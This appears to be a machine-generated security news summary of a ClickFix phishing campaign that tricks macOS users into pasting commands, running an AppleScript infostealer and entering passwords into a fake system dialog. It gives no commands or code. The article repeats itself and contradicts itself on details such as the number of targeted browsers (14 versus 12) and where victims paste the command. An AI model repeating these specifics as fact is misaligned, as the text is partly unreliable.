Ethical Hacking News
A sophisticated phishing campaign targeting macOS users has been discovered, utilizing social engineering tactics to trick individuals into divulging sensitive information such as user credentials and live session cookies. Apple has taken steps to address this issue by including a new feature in the latest versions of macOS Tahoe (26.4) or macOS Sequoia. However, users are still vulnerable if they run an older OS version or ignore the macOS warning. This phishing campaign highlights the importance of staying vigilant against social engineering tactics and taking proactive steps to protect oneself.
Cybersecurity experts have discovered a sophisticated phishing campaign targeting macOS users using ClickFix social engineering tactic. The attackers collect sensitive information such as user credentials, browser session cookies, and data from browser extensions. The campaign primarily affects finance sector users in Asia and utilizes fake CAPTCHA prompts and cleverly crafted messages to manipulate victims into divulging their login credentials. Apple has included a new feature in macOS Tahoe (26.4) or Sequoia that alerts users when attempting to paste potentially malicious commands, providing an additional layer of protection against ClickFix attacks. The malware targets user passwords and collects data from 12 Chromium-based browsers, as well as cryptocurrency wallets and password manager credentials.
Cybersecurity experts have recently discovered a sophisticated phishing campaign targeting macOS users, utilizing the infamous social engineering tactic known as ClickFix to trick individuals into executing malicious commands on their own computers. The attackers have been using AppleScript-based infostealers to collect sensitive information such as user credentials, live session cookies from 14 browsers, and data from over 200 browser extensions.
The campaign, which has been observed in Asia and primarily affecting users in the finance sector, utilizes a combination of fake CAPTCHA prompts and cleverly crafted social engineering messages to manipulate victims into divulging their login credentials. The malware, once executed, downloads a malicious script that captures user information and sends it to an attacker-controlled server.
According to Netskope Threat Labs researcher Jan Michael Alcantara, the team initially observed this campaign last month and has seen similar instances as recently as last week. The attackers have also been using client-side JavaScript to filter victims by user-agent, ignoring mobile devices and directing desktop users to either a Windows or macOS-specific payload.
The fake CAPTCHA prompts the user to open Spotlight on their Mac, and then paste a "verification code" into the search feature. Once the victim hits Enter and executes the command, it silently downloads a malicious script from the attacker-controlled server. The script collects the victim's username, hardcodes the command-and-control (C2) server address, and creates a temporary directory at /tmp/xdivcmp/ to stage all of the stolen data before sending it to the C2.
Apple has taken steps to address this issue by including a new feature in the latest versions of macOS Tahoe (26.4) or macOS Sequoia. This feature alerts users when they attempt to paste potentially malicious commands into the Terminal application, providing an additional layer of protection against ClickFix attacks.
However, if a user is running an older OS version or for some reason ignores the macOS warning and clicks the "paste anyway" option, the malware moves on to the credential-harvesting stage. It then deploys a sneaky social engineering dialog box that loads the authentic macOS system lock icon from local resources. Users see the lock, think it's a legit Apple dialog box, and then enter their system password.
The malware takes extreme measures to force credential entry. There is only one action button, with no option for users to close the dialog box window. The dialog box keeps reappearing until the victim enters a valid password. User passwords are validated in real-time using macOS's directory services authentication, and if incorrect, the dialog box reappears, continuing the loop until the person provides a correct password.
In addition to collecting user credentials, the stealer also targets 12 Chromium-based browsers: Chrome, Brave, Edge, Vivaldi, Opera, Opera GX, Chrome Beta, Chrome Canary, Chromium, Chrome Dev, Arc, and CocCoc. For each of these, it searches user profiles and steals session tokens, authentication cookies, saved passwords, and other autofill information including credit card numbers.
Furthermore, the malware is configured to swipe details from cryptocurrency wallets such as MetaMask, Phantom, Coinbase Wallet, Trust Wallet, and dozens of blockchain-specific ones. It also collects password manager credentials from LastPass, 1Password, Dashlane, Bitwarden, two-factor authentication apps including Authy and Google Authenticator extensions, and various VPN and single sign-on extensions used for corporate access.
This sophisticated phishing campaign highlights the importance of staying vigilant against social engineering tactics. As attackers continue to evolve their methods, it is essential for users to remain aware of these risks and take proactive steps to protect themselves. By keeping their operating systems up-to-date, utilizing reputable antivirus software, and exercising caution when interacting with suspicious emails or prompts, individuals can significantly reduce the risk of falling victim to this type of attack.
In conclusion, the ClickFix phishing campaign is a stark reminder of the evolving nature of cybersecurity threats. As attackers continue to push the boundaries of what is possible, it is crucial for users and organizations alike to remain proactive in protecting themselves against these types of attacks.
Related Information:
https://www.ethicalhackingnews.com/articles/A-Sophisticated-Phishing-Campaign-Targets-macOS-Users-Exploiting-ClickFix-Social-Engineering-Tactic-ehn.shtml
https://go.theregister.com/feed/www.theregister.com/2026/04/21/macos_clickfix_attacks_deliver_applescript/
https://www.theregister.com/2026/04/21/macos_clickfix_attacks_deliver_applescript/
https://www.bitdefender.com/en-us/blog/hotforsecurity/the-clickfix-scam-infect-your-own-mac
Published: Tue Apr 21 12:23:27 2026 by llama3.2 3B Q4_K_M
